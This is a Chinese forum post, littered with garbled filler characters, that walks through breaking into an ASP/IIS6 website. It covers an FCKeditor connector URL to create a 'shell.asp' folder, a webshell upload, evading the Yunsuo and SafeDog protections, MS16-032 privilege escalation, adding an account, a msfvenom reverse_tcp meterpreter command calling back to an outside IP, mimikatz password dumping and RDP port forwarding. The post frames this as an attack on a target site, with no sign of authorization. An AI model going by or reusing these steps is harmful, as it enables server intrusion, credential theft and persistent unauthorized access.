|
% }( u- M' J% M& ]+ L$ s: @
& i4 T8 p& R5 M# w
( C+ }+ P2 L/ y; O
& E" ~& @0 T2 \8 ]& `9 e8 N | 9 G( }* Q5 B2 z! W5 i% d3 @
C1 R( l7 D- g
2 ~4 t! {. k; W# l5 E5 R
一、 利用getwebshell篇
8 ?% T: N2 Q9 x. a( B7 P! C$ X
+ u! r& i; l7 v$ I首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
. |) ~4 y/ w8 F. d. y0 l
2 s/ X3 d* [& P0 ?
4 w5 R$ Q) c+ ^, r( C下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
( v# o! P2 X4 s3 t( l \
+ S% U: {3 I. ^
下面我们构造一个asp目录,如: 0 e( _! D, s q& J
. {& ?3 ~! t6 ?9 k, ] ! ]$ U. f+ g$ D
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 0 d( p K2 j" d! u D* X) c
+ P; S6 c6 j( }# S' R 6 x; V! i! V+ _' m" D
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
# |; `. m; F4 J, p! b$ Y
% ~. ?! e3 m, q) e
一、 绕过安全狗云锁提权并且加账号
- s& y5 M7 b' y3 X* o( [4 F
% h4 ?2 Q. G/ Z. \' ]- s没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
) a% [% t2 |4 |: V- c9 e' U
/ h1 i1 |# B; C$ I( J$ H; U
如图:
5 C+ M# V! F) o g1 T9 a
/ M4 k" Q! d" b; T: i; w# s! o/ ~/ e( o然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
6 V' T. m- |5 ~, Z Y3 l9 n! l* R2 l
! }( g: {) R$ f1 ]; }9 r一、 利用metasploit
' f" K( L* O& q7 j# [
0 v& t; V8 E( L! c2 }- K首先用pentestbox生成一个64位的payload如下命令
% T2 Z, }+ d5 k# e3 E- |
* H" Q2 `+ y- m
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
& V1 F. T8 A( \' G
# C ^6 |6 r* d+ d- Y# O
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
! c' Y& X7 U! Q3 W" [
: Q) P4 V L9 N4 o" _4 K, P
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
& ~6 J! H0 B. Q4 Y' J z
* W* q; T% M, m; f7 T0 e
下面我们来做一个监听如下命令:
3 k6 P2 {/ }* b* e7 [4 p( w
# O# p8 L' C$ V, h
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
( d& @. h, ]9 k, C8 t3 J ) O: S3 E9 X, \! A, X0 j
3 g8 `" L3 n6 O8 u. A* P: H8 I |
. L8 A/ j3 G1 F1 m1 w5 Y: Q. { ' U3 r. G9 p7 A: g, M# S
9 } M5 l! q/ s# K# q6 i% @% u R % S0 C7 `! T- l Q1 X2 j5 f- H8 |/ X) B
Q+ V2 n% z' h; Y$ T5 \5 j9 Q/ |
5 F# b3 Y- B6 n# m) j
3 G' i3 L( d8 f
& `+ L5 A8 j# W6 Q : y' a; M1 x- k; H+ N
$ n& t) b* ]/ P, Q' p# q. I
9 J5 O' m/ j4 _3 `1 k
- J) }; |3 r$ k* I
& M! F! Q& @5 Z# M
# n2 k: S) v1 `
| 
发表于 2018-10-20 20:31:43
收藏
分享
支持
反对
匿名
发表于 2021-11-20 23:30:06